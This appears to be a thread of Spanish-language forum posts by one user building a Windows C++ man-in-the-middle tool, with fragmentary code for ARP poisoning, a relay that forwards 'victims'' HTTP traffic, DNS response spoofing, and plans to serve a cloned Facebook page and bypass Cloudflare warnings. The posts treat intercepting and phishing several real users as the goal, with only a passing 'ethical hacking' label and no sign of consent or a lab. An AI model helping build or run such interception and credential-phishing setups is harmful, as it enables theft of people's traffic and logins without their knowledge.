Para cuando se de el caso de que un parametro de una función se llame igual que una variable declarada en la función, y no tener que renombrar una de ellas, me vendría bien un this de los de java.

A ver si encuentro algo mientras.

Saludos.

http://stackoverflow.com/questions/6905598/c-equivalent-to-java-this

void envenenamiento_activo(lista_victimas *lista)
{
lista_victimas *lista;
	this->lista = lista;

Si no se puede hacer con una clase static, es como si no se puede hacer para mi código.

Resulta que al hacer sizeof(mac), obtengo 4 bytes, cuando una mac tiene 6 bytes, uno para cada u_char si no me equivoco.

u_char *mac_gateway = new u_char[6]();
 
		u_long num_gateway = inet_addr(adaptador->GatewayList.IpAddress.String);
 
 
		if (num_gateway == INADDR_NONE){
			Sleep(REINTENTAR_MITM * 1000);
			continue;
		}
 
		if (!enviar_arp(adaptador->GatewayList.IpAddress.String,
			adaptador->IpAddressList.IpAddress.String, mac_gateway)){
			Sleep(REINTENTAR_MITM/2 * 1000);
			continue;
		}
 
		for (int i = 0; i < 6; i++)
			printf("%d=%x ", i,mac_gateway[i]); 
 
		system("pause");
 
		for (int i = 0; i < 4; i++)
			printf("%d=%x ", i, ip_gateway[i]);
		system("pause");
		cout << sizeof(mac_gateway) << sizeof(mac_atacante);

Me salen que todas las macs tienen 4 bytes WTF, la ip son 4 bytes, pero las macs no se supone que tienen 6?.

Me he quedado un poco loco con esto. Haber si sabéis algo.

Gracias, un saludo.

Edito: Que broma es esta:

u_char *mac = new u_char[500]();
cout << sizeof(mac);

Hola a todos, necesito hacer 2 cosas con los paquetes dns response.

Primera: modificar todos sus campos de ip, para poder hacer dns spoofing, para ello hay que saber en que posición están los bytes de las ips.

Segunda: obtener el dominio que contienen y la ip real del mismo. Para ello necesito saber donde estan los bytes del dominio y de la ip real.

Con el wireshark he ido probando y es bastante jodido. De momento solo quiero extraer el dominio y la ip que me da el dns response, puede haber más de uno, y cada campo con distintos tamaños (locura).

(C++): En construcción.. A ver quien consigue calcularme el tamaño de cada query y response dns.

Saludos.

Edito: Lo que me rompió los esquemas fueron las "answers", que parecía que siempre tenían 16 bytes, hasta que pumm, había una que incluía el dominio en ella, me refiero al atributo CNAME: ... ,entonces todo se vino abajo. ¿se puede saber si van a incluir el dominio o no? Se puede observar que solo la primera answer lleva el CNAME, las demás no, es como resolver una ecuación de 100 incognitas XD.

Edito: Quizás este proyecto pueda ayudarme:

https://github.com/maurotfilho/dns-spoof/blob/master/dns-spoof.c

Hola, tengo un problema con el MITM, cuando las victimas se van a conectar a mi servidor el servidor recibe la respuesta y reenvia la petición al servidor destino a través de un send(), luego recibe la respuesta de ese servidor y la reenvía la víctima tal cual.

El problema es que cuando haya 30 víctimas ¿como tendré que programar esto?, ¿tendría que crear un subproceso para cada cliente conectado al servidor? ¿sería viable? ¿alguna otra posible solución?.

Os dejo el code, que cambiaríais??.

while (*on_mitm){
 
			int victima;
			sockaddr_in addr;
			addr.sin_family = AF_INET;
			int len = sizeof(addr);
 
			if ((victima = accept(servidor, (struct sockaddr*)&addr, &len)) == INVALID_SOCKET){
				closesocket(victima);
				Sleep(100);
				continue;
			}
			else{
				cout << "conectadoo";
				setsockopt(victima, SOL_SOCKET, SO_RCVTIMEO, (char*)&tiempo_espera, sizeof(timeval));
				setsockopt(victima, SOL_SOCKET, SO_SNDTIMEO, (char*)&tiempo_espera, sizeof(timeval));
 
				u_char *ip_victima = new u_char[4]();
				u_long num_victima = inet_addr(inet_ntoa(addr.sin_addr));
 
				if (num_victima == INADDR_NONE){
					closesocket(victima);
					Sleep(100);
					break;
				}
 
				ip_victima = (u_char*)&num_victima;//busco en la lista ultima.
 
				string respuesta;
				char *bloque = new char[3000]();
				setsockopt(victima, SOL_SOCKET, SO_RCVTIMEO, (char*)&tiempo_espera, sizeof(timeval));
				while (int res = recv(victima, bloque, 3000, 0) > 0)
					respuesta += string(bloque);
 
				cout << "recibido";
				if (respuesta.length() == 0){
					closesocket(victima);
					Sleep(100);
					break;
				}
 
				int cliente;
				sockaddr_in cli_local;
 
				cout << respuesta << endl;
				respuesta = eliminar_encoding(respuesta, true);
				cout << respuesta << endl;
 
				if ((cliente = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR){
					cout << "falla socket" << GetLastError();
					Sleep(REINTENTAR_PROXY * 1000);
					continue;
				}
 
				cli_local.sin_family = AF_INET;
				cli_local.sin_port = htons(80);
				cli_local.sin_addr.s_addr = inet_addr("217.160.43.9");
 
				if (connect(cliente, (struct sockaddr*)&cli_local, sizeof(cli_local)) == SOCKET_ERROR){
					cout << "error conectar" << GetLastError();
					closesocket(cliente);
				}
				else{
					if (send(cliente, respuesta.c_str(), respuesta.length(), 0) == SOCKET_ERROR){
						cout << "error enviar" << GetLastError();
						closesocket(cliente);
					}
					else{
						respuesta = "";
						while (recv(cliente, bloque, 3000, 0) > 0)
							respuesta += string(bloque);
 
						if (respuesta.length() == 0){
							closesocket(cliente);
							closesocket(victima);
							Sleep(100);
							break;
						}
 
						cout << "respuesta server: " << respuesta << endl;
						respuesta = eliminar_encoding(respuesta, false);
						cout << respuesta << endl;
 
						if (send(victima, respuesta.c_str(), respuesta.length(), 0) == SOCKET_ERROR)
							cout << "fallo reenvio a cliente " << GetLastError();
						else
							cout << "se envio al cliente"; 
					}
				}
			}
			Sleep(100);
		}

Saludos.

string respuesta;
				char *bloque = new char[3000]();				
				while (int res = recv(victima, bloque, 3000, 0) > 0)
					respuesta += string(bloque);

... mientras que esto es instantáneo? : recv(victima, bloque, 3000, 0);

¿No hay algún timeout para que salga?, o ¿no se puede hacer algo?.

Saludos.

Hola a todos,

hasta ahora cuando he trabajado con subprocesos he trabajado con async(), pero es lo mismo que un thread o mejor?. Además no son autenticos thread ¿no?.

Lo digo porque cuando programaba en C# y creaba un nuevo thread en el administrador de tareas salían 2 ejecutables con el nombre del programa el normal y el del thread, sin embargo en cpp ¿como se crea un thread así?.

También el mutex me vuelve un poco loco, da muchos errores, la verdad me esta costando trabajar con procesos bastante XD. ¿Dónde lo declaro para que haya uno único para todo el programa.

Simplemente lo necesito para hacer el reescaneo de hosts ya que allí actualizo la lista de victimas, meto mutex actualizo lista y unlock(), y en todas las partes del programa que se accede a la lista lo mismo lock() y unlock() al salir, es horrible.

Saludos.

Hola a todos, tengo una duda sobre clonación de una web, ¿cómo se hace si queremos clonar para 10 victimas distinas?.

La idea es hacer un MITM, después hacer DNS spoofing a todas las víctimas diciendo que al dominio sugerido le corresponde mi IP.

Después tendré que montar un servidor ¿en puerto 80 o puede ser otro puerto?, en el que se conecten las víctimas, ese servidor actuaría de cliente pediría datos a los dominios reales que sugirió la víctima y los devolvería a las víctimas modificados si así lo deseamos.

Pero.. Si hay 10 víctimas, y cada una carga 5 pestañas de varios dominios diferentes ¿que habría que hacer?, ¿puedo hacer que mi servidor a parte de diferenciar a las víctimas que diferencie si cargan para una pestaña u otra?, más o menos.

¿La solución está en montar un servidor en el puerto 80 del atacante?, ¿eso podría clonar páginas para varias víctimas aunque soliciten mismos dominios etc?.

Solo quiero saber si es físicamente posible, antes de entrar a programar.

Saludos.

Buenas, lo acabo de implementar y me salen alertas en el navegador de la victima, avisos de cloudfare para páginas normales (raras que he probado unas pocas) y de google si es google.

Seguiré investigando, seguramente se pueda bypassear, justo lo acababa de conseguir y sale esto XDD, me daba error al principio de que era un byte menos en la ip, luego error del checksup udp en el paquete dns que no sabía que existia y lo dejaba igual, luego un error en un for del checksup udp y ya funciona, hace dns req, y mando la dns response falsificada con otra ip para el dominio que solicito, pero salen alertas.

¿Alguien sabe porque? ¿Si ya no funciona? ¿que tipo de seguridad tiene? ¿Y si se puede bypassear?.

Saludos.

Edito:

Error:


Me dice que he solicitado una página que está en la red cloudflare. Vaya, todas deben de estar en esa red menos google visto lo visto :/.

Edito:

https://www.cloudflare.com/ddos

Vaya vaya, esto tiene mala pinta, cuando la victima va a la página "facebook.com" con una ip spoofeada "89.212.23.1", pasa por el servidor cloudflare si pertenece a la red de este, entonces cloudflare lo detecta y envía un mensaje de alerta en su lugar.

AAAMIGOS.

Supongo que se podrá hacer bypass creando un servidor http en el atacante y que cuando cargue "facebook.com" le pasamos la ip del atacante, entonces no saldrá fuera del router y no pasará por cloudflare, se conectaría a nosotros creyendo que es facebook, ya solo quedaría tener preparada una página falsa de facebook en nuestro ordenador, que hayamos cargado previamente de la verdadera con peticiones del atacante.

Saludos.

Edito: Bueno, creo que ya se para lo que vale el dns2proxy... seguramente que para esto.

Hola, básicamente quiero que todos los paquetes salientes hacia el router con destino puerto 80 sean redirigidos hacia mí (localhost) y el puerto escogido como por ejemplo el 10000, hacer este comando pero para windows:


Pero probando con netsh, lo más parecido que encuentro es esto:


Que se supone que redirige los paquetes que van a puerto 80 con destino cualquiera, hacia mi ip en la red, pero a pesar de hacerlo las páginas cargan y tengo conexión luego no redirige puesto que llega al router y salen, ¿que puedo hacer?.

Saludos.

La investigación apunta a: https://social.technet.microsoft.com/Forums/windows/en-US/6be8d1f0-f01b-47cf-beae-4d2cfc9c4111/redirect-all-local-port-80-traffic-to-remote-proxy-server?forum=w7itpronetworking

https://technet.microsoft.com/es-es/library/cc731131(v=ws.10).aspx

Con esto no crea ningún servidor proxy y todas páginas cargan por igual:


No hay manera.. ¿?


Estoy probando con wireshark filtrando los puertos a los que redirijo y no llega ningun paquete, PUTO WINDOWS! :*****

Recomiendo está página para hacer pruebas:

http://raunomagi.blogspot.com.es/2012/05/port-forwarding-on-windows-computers.html

Interesante, he probado esto:


Y al conectar con un cliente en mi puerto 80 funcionaba, lo que hace es establecer un servidor en puerto 80 para conexiones de puerto 10000? Esto no es port fordwarding!, bueno seguiré probando a ver si comprendo un poco más.

.. http://stackoverflow.com/questions/24646165/netsh-port-forwarding-from-local-port-to-local-port-not-working

Todo esto lo que hace es modificar la entrada hacia el pc no la salida, lo que hace crea un server en un puerto escuchando, y redirige a otro puerto, lo que busco es que redirija la salida hacia mi, de manera que no habrá paquetes que salgan hacia el router, pero parece que no es el camino.

Pues eso, he redirigido los paquetes TCP del puerto 80 al puerto 123 (por ejemplo) y ahora quiero leerlos con un socket o no se con qué por eso creo el hilo. Para poder trabajar con ellos y continuar con mi proyecto de hacking etico.

Saludos.